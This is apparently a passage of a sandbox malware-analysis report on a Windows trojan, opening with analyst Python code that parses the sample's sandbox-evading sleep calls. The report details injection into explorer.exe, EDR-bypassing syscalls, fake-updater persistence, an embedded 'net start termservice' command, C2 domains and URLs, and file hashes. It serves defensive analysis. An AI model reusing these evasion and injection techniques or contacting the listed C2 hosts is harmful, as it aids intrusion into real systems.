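    """The decision a check of this shape can make: if cpuid costs more than
    `threshold` cycles on average, the instruction is being trapped (assumed
    threshold; the sample's own cut-off is not visible in the report)."""
    n = min(len(samples), ITERATIONS)
    return n > 0 and tsc_loop_total(samples) / n > threshold


# "Thread sleep time" rows: source image, thread id, then the delay. The row
# format is the fused text export; an optional " | " divider is tolerated.
SLEEP_ROW = re.compile(
    r"^\s*Source:\s*(?P<src>.+?)(?:\s+TID:\s*(?P<tid>\d+))?\s*\|?\s*"
    r"Thread sleep time:\s*(?P<ms>-?\d+)s")

# Rows copied from this report.
SLEEP_ROWS = r"""
Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe TID: 7312Thread sleep time: -40000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe TID: 8124Thread sleep time: -40000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1720Thread sleep time: -90000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 6108Thread sleep time: -180000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 764Thread sleep time: -180000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1720Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2504Thread sleep time: -180000s >= -30000sJump to behavior
""".splitlines()


def sleep_budget(lines):
    """Milliseconds requested per process image, summed over all its threads.
    The value is in milliseconds despite the 's' suffix (180000 = 3 minutes);
    the sign marks a relative delay and is dropped."""
    totals = {}
    for line in lines:
        m = SLEEP_ROW.match(line)
        if m:
            image = m["src"].rstrip("\\").rsplit("\\", 1)[-1]
            totals[image] = totals.get(image, 0) + abs(int(m["ms"]))
    return totals


def exceeds_sandbox_budget(totals, budget_ms=ASSUMED_SANDBOX_BUDGET_MS):
    """Images whose requested sleep alone outlasts the analysis window."""
    return sorted(image for image, ms in totals.items() if ms >= budget_ms)


if __name__ == "__main__":
    totals = sleep_budget(SLEEP_ROWS)
    for image, ms in sorted(totals.items()):
        print(f"{image}: {ms / 1000:.0f} s requested")
    print("outlasts budget:", exceeds_sandbox_budget(totals))
```

The injected explorer.exe alone asks for 660 s of sleep across its threads, which is why the sandbox has to patch NtDelayExecution (the "Thread delayed" rows) rather than wait it out; the updater copy and the original sample each request 40 s.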

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Windows\SysWOW64\explorer.exe Network Connect: 188.114.97.3 80
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_00767EB0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,14_2_00767EB0
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe NtProtectVirtualMemory: Direct from: 0x6E5D2C38
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe NtProtectVirtualMemory: Direct from: 0x6E5B2D04
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe NtSetInformationThread: Direct from: 0x79ACD3
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe NtQuerySystemInformation: Direct from: 0x517AFF
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe NtProtectVirtualMemory: Direct from: 0x6C86214E
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe NtSetTimerEx: Direct from: 0x76EF7B2E
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe NtQueryInformationToken: Direct from: 0x6C6980B4
                    Source: C:\Windows\SysWOW64\more.com Memory written: PID: 4348 base: B079C0 value: 55
                    Source: C:\Windows\SysWOW64\more.com Memory written: PID: 4348 base: 9F0008 value: 00
                    Source: C:\Windows\SysWOW64\more.com Memory written: PID: 3492 base: B079C0 value: 55
                    Source: C:\Windows\SysWOW64\more.com Memory written: PID: 3492 base: 3129008 value: 00
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write
                    Source: C:\Windows\SysWOW64\more.com Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write
                    Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\explorer.exe base: B079C0
                    Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\explorer.exe base: 9F0008
                    Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\explorer.exe base: B079C0
                    Source: C:\Windows\SysWOW64\more.com Memory written: C:\Windows\SysWOW64\explorer.exe base: 3129008
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                    Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                    Source: C:\Windows\SysWOW64\more.com Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0078A37F cpuid 14_2_0078A37F
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: GetLocaleInfoW,14_2_007A222E
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_007A2354
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: GetLocaleInfoW,14_2_007A245A
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: GetLocaleInfoW,14_2_0079842E
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_007A2529
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,14_2_007A1BC8
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: GetLocaleInfoW,14_2_007A1DC3
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: EnumSystemLocalesW,14_2_007A1E6A
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: EnumSystemLocalesW,14_2_007A1EB5
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: EnumSystemLocalesW,14_2_007A1F50
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: EnumSystemLocalesW,14_2_00797F0C
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,14_2_007A1FDB
                    Source: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\9c813d63 VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Queries volume information: C:\Users\user\AppData\Local\Temp\bca94d0c VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Queries volume information: C:\Users\user\AppData\Local\Temp\be3cb5d2 VolumeInformation
                    Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe VolumeInformation
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0076E8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,14_2_0076E8D0
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0077F060 Sleep,RegOpenKeyExA,RegCloseKey,GetUserNameA,GetModuleFileNameA,14_2_0077F060
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_0079E430 _free,_free,_free,GetTimeZoneInformation,_free,14_2_0079E430
                    Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_007691B0 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,14_2_007691B0
                    Source: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Remote Access Functionality

                    Source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
                    Source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setb91ec37b19247dd92a901a8f950c08d9f5a43204a66445ad0e09c0db80eb910b776334a83469992ad7a23ca2f09ee0eb5da9daZVz4fehA1U0n9B4f5XPk1W2E9QGn2f8hc0Q=Mx8mcUllK0If7nQjC2jjPGS9Jhqq2x==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gLsZ0ZxMYZqOvgA1k9f7JAu3zH9B2izXAK6AkEmdy==ZVz4fehA1U0n9B4f5XPk1W2E9QGn2gPsZ0ZxMY380elm30IeIlbn3mPa5C2B9Bp=OQUAOo==VwQpdzQuKQRwfI==MQLwfI==0UG6PLViPkQdVD==S184fPRuBkMXVT==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwIZ8h0O==VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgXPJm3gsM7JYq3Czv22upXRyBV1HlefN23y==VkLxZ0RoKu5EyDAGNHoQzC7oB3BlVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hShKwdlLy1yttCxz VFzz1VFi2VD=VYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1DgSVRz3kMn I2j4nLe222hPR7y1Dbw0VzgWUdm2En NpbqQGTn3w==KTLXTNFRKi0zOXADAQ==YCvAes==VCZXXs==SYLYbUG elC d0G c1C Zka ZVy dEC eUU 0EQ ZVO cFO c03 dhQ=Z1zp1u1l2Eo1U5An4C3 2GucZ1zp1u1l2En=Z0nteu1l2En=0Bu=0Ru=0Ry=0RC=UUvtd9==bFH4evkwBu==bFH4ezI7BwZ=0V8p0EnwZ0RodFCBcVDtfkbAM1v5cOR1QEC+QEG+MZrwfO q2lDoLwivJu==gy==KlLycPM QO==d08pdysACgWd8Jz=b0LCdeRtCxznVJAqS0L4VeB11VQeQ6ox5GTiIW2r q==VFzz1VFi2SIa JIaRTPFWTMhK00f Kgf4mS=RVPteeA=T0vDeyRz30kYEHAfPg==STDJXs==VEvy1yAhK0Mc 0Mn5Hi=SEZnfy5zyD5eUj==RTPLNxOAXy51OUoMVZQZ4mjP5Q==Rkb41yRnPUWdV0L=UkZCfy5vV0ZAcy5AR0ZxdUNwW0byTyRnPUWdV0L=NBuCOrM2Dh4XKT==dky=e0y=R0ZyfyRv4ASNa0EjFizi4Wu59Rqj2kTt0kZCdKXlOVIaKBEg33TjPGCDcNPvAP3rMQQxNKWuEOfHdU11PUWTHXUn43zk32i59QYwDfEkc1zxNONi4Ev0EJ8f3WSYymOmbAtkDvEkbUnpdeBuPRRbJeQOSU5v4EMn F4S6XzaEiymaBqu0TQfeEbzda5wO1Ie 
F4x5HHaOWXSAaPMEOexNKWuBQR=MQQRE9==Q1DnebWyMkfA1o==R0ZyfyRv4ASNa0EjFiz73Hyx9QCj3DotcgZ8NP 44wSf86MrCXTn2GSzWWYmOTT=VZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6M5br4HTPPXGTWQQnMBQtcVr5fyRzJkwmVT==R0ZxezR1PVAHUZ4jZUzn1yRnP09i7pwq3W3k3HCDaXG33kg2fVeAOLEADBLVJCj3CV6=MVLycOJwPELmVZbXXwRONCEU9qMj3nPs2225agYuJZYYYCDzdfNz20o6RZ8n5GT LmipXQYeFXbMWDzTVxtXISIyP4z=VZbXXwRONCEo8qUw32vIPXNBKxueJZYwekbn1PJdGkws7ZQC2XLl2GC VzOrODYtWkbo1O5KHy==YBqAOvw=SELq0PRt4DEe KUn3mboBleXXRCx1EYYbUZySELq0PRt4DEe KUn3mboBliXXRCx1EYYbUZyVYZKXx CKiM6PZoh4m7o22W5Vz3r1jUte1CkVdNdG1Mr9pYs5FXa3nKu WT=VFzz1zRk4CWa8ZX=NhqBQI==NhqCO9==NhqBP9==NhqCPI==R1LCeeRv4CAU7ZAiYy==Phe dlLy1yttCxznV0kjM0ikJlHleUps1UolEFbkzC7e2SxnJgqqLax11USe86YYzDC6ziVlXAKuxx==KgOkTPdq4Az=JgqqLaxzPUV JAOqKs==VEZ71PFA1EMl8F8j6GS=MUL81OJ24Eco8qEt3Gj95SyDXQQx3DYxbU4y1OMhBSQi8JXezg==Je==d085fyNw40V H0PeCXO6CA==d1Gceo==dkvy1y5uT0L90e5i3kH PJI333TPNFyDXQmxNTT=NBqAOvw1CRb=NBqAOvw1Chz=NBqAOvw1ChD=NBqAOvw1C0P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000
                    Source: more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
                    Source: explorer.exe String found in binary or memory: net start termservice
                    Source: explorer.exe, 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp String found in binary or memory: net start termservice
                    Source: explorer.exe, 00000010.00000002.2933737758.00000000001D0000.00000002.00000001.01000000.00000000.sdmp String found in binary or memory: net start termservice
                    Source: cnfpnteryde.1.dr String found in binary or memory: net start termservice
                    Source: vkqcbyjdfiw.12.dr String found in binary or memory: net start termservice
                    MITRE ATT&CK matrix (the number in parentheses is the count the report shows next to a technique):

                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | Scheduled Task/Job (1) | Process Injection (511) | Masquerading (11) | OS Credential Dumping | System Time Discovery (2) | Remote Desktop Protocol (1) | Screen Capture (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | Scheduled Task/Job (1) | DLL Side-Loading (11) | Scheduled Task/Job (1) | Virtualization/Sandbox Evasion (21) | LSASS Memory | Query Registry (1) | Remote Desktop Protocol | Archive Collected Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Abuse Elevation Control Mechanism (1) | Process Injection (511) | Security Account Manager | Security Software Discovery (221) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | DLL Side-Loading (11) | Deobfuscate/Decode Files or Information (1) | NTDS | Process Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (2) | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Abuse Elevation Control Mechanism (1) | LSA Secrets | Virtualization/Sandbox Evasion (21) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (2) | Cached Domain Credentials | Account Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | DLL Side-Loading (11) | DCSync | System Owner/User Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | System Information Discovery (235) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 1542426 | Sample: 5Z1WFRMTOXRH6X21Z8NU8.exe | Startdate: 25/10/2024 | Architecture: WINDOWS | Score: 100

                    Contacted domains: artvisions-autoinsider.com, artvisions-autoinsider3.com, artvisions-autoinsider2.com

                    Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 4 other signatures

                    Process tree:
                    • 5Z1WFRMTOXRH6X21Z8NU8.exe (started): Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces. Starts more.com.
                    • logioptionsplus_updater.exe (started): Found direct / indirect Syscall (likely to bypass EDR). Starts more.com.
                    • logioptionsplus_updater.exe (started).
                    • more.com (child of 5Z1WFRMTOXRH6X21Z8NU8.exe): dropped C:\Users\user\AppData\Local\...\cnfpnteryde, PE32; Contains functionality to start a terminal service; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 2 other signatures. Starts explorer.exe and conhost.exe.
                    • more.com (child of logioptionsplus_updater.exe): dropped C:\Users\user\AppData\Local\...\vkqcbyjdfiw, PE32; Maps a DLL or memory area into another process. Starts explorer.exe and conhost.exe.
                    • explorer.exe (child of the first more.com): network connection to artvisions-autoinsider.com 188.114.97.3, 49838, 80 CLOUDFLARENETUS European Union; System process connects to network (likely due to code injection or exploit); Contains functionality to start a terminal service; Contains functionality to inject code into remote processes; Switches to a custom stack to bypass stack traces.

Source | Detection | Scanner | Label | Link
5Z1WFRMTOXRH6X21Z8NU8.exe | 18% | ReversingLabs | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\cnfpnteryde | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw | 100% | Joe Sandbox ML | |
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.symauth.com/cps0( | 0% | URL Reputation | safe |
http://www.symauth.com/rpa00 | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
artvisions-autoinsider.com | 188.114.97.3 | true | true | | unknown
artvisions-autoinsider3.com | unknown | unknown | false | | unknown
artvisions-autoinsider2.com | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://artvisions-autoinsider.com/8bkjdSdfjCe/index.php | true | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
188.114.97.3 | artvisions-autoinsider.com | European Union | | 13335 | CLOUDFLARENETUS | true
                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1542426
                                                                                                      Start date and time:2024-10-25 22:41:28 +02:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 7m 36s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Run name:Run with higher sleep bypass
Number of new started processes analysed:16
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:1
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:5Z1WFRMTOXRH6X21Z8NU8.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.expl.evad.winEXE@13/7@3/1
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 96%
                                                                                                      • Number of executed functions: 30
                                                                                                      • Number of non-executed functions: 85
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, oneocsp.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • VT rate limit hit for: 5Z1WFRMTOXRH6X21Z8NU8.exe
Time | Type | Description
21:43:18 | Task Scheduler | Run new task: logioptionsplus_updater path: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
Match: 188.114.97.3
Associated Sample Name / URL | Detection | Threat Name (context URLs listed below each entry)
PO 4800040256.exe | malicious | FormBook
• www.cc101.pro/4hfb/
QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger
• filetransfer.io/data-package/cDXpxO66/download
Instruction_1928.pdf.lnk.download.lnk | malicious | LummaC
• tech-tribune.shop/pLQvfD4d5/index.php
WBCDZ4Z3M2667YBDZ5K4.bin.exe | malicious | Unknown
• tech-tribune.shop/pLQvfD4d5/index.php
yGktPvplJn.exe | malicious | Pushdo
• www.rs-ag.com/
https://is.gd/6NgVrQ | malicious | HTMLPhisher
• aa.opencompanies.co.uk/vEXJm/
Comprobante de pago.xlam.xlsx | malicious | Unknown
• paste.ee/d/KXy1F
01YP9Lwum8.exe | malicious | DCRat
• 77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn.php
PO-000041522.exe | malicious | FormBook
• www.freedietbuilder.online/nnla/
http://onlinecheapflights.net/ | malicious | Unknown
• onlinecheapflights.net/
                                                                                                      No context
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name (context IPs listed below each entry)
https://deborahmeagher.com.de/kfOoB/ | malicious | HTMLPhisher
• 104.17.25.14
VAIIBIHmtT.exe | malicious | Stealc
• 104.21.56.70
Bill Payment__8084746.html | malicious | Unknown
• 104.17.25.14
ACTION required to activate your account - bp Supplier Portal.eml | malicious | Unknown
• 172.66.0.126
http://www.wattpad.com | malicious | Unknown
• 104.22.74.216
dekont_001.pdf.exe | malicious | Snake Keylogger
• 188.114.97.3
                                                                                                      https://docs.google.com/drawings/d/1gvM7ysnJ7zDcSUShXnPoiA6pG4cjDDn9uHRbivsGidA/preview?pli=1jjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQn
ZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZs | malicious | Mamba2FA
• 104.17.25.14
(No subject) (92).eml | malicious | Unknown
• 104.18.65.57
Setup.exe | malicious | LummaC
• 188.114.96.3
RobCheat.exe | malicious | Python Stealer, CStealer
• 172.67.75.40
                                                                                                      No context
                                                                                                      No context
                                                                                                      Process:C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe
                                                                                                      File Type:PNG image data, 2336 x 1336, 8-bit/color RGB, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1490149
                                                                                                      Entropy (8bit):7.993654685735998
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:24576:/rn/8iouvLod8ehALdbU5iHTP/xyIjuWoS7i+7ntpYPAtzX7N4ToLQa3pY8U8/:/r/8ML+8QAZbT/IEdomiuPYYiS7D/
                                                                                                      MD5:9293AFEB225399232240F1E3F3255218
                                                                                                      SHA1:E7722613BA9E360D08D55161872908C797E52073
                                                                                                      SHA-256:ADF9640C1D99B3EDECA66D9F8359CF37815C8C2770078527B4570BCE5EBA4CBC
                                                                                                      SHA-512:6C0BA94AFEC426FCEFEDB6741F623E19CFD8F23B63B7FDB2A12B94AB6BE7534D56ED273EFE0FBBA7E9DB87E61F88C923F947493156DC532B57B28936DDF863C7
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Process:C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1275486
                                                                                                      Entropy (8bit):7.651198167214753
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:AfJB7Oca2gC/dSipEBZGR31m/UTORv5O1+klFPa0R/ISE8VWcftYQc6vCWAoZmWs:E7Br1SVBZ4lmsmYNni+ISEuBFh8gdsE8
                                                                                                      MD5:73680C60EBB8AF0D53D554A508F347FE
                                                                                                      SHA1:6977123C1F1EC26864BED46988D7ECC1292F0E7E
                                                                                                      SHA-256:749FBDD4C1633AB7BEA684BAE3356842B25ED8B233A7E8B25642058A8353DCF0
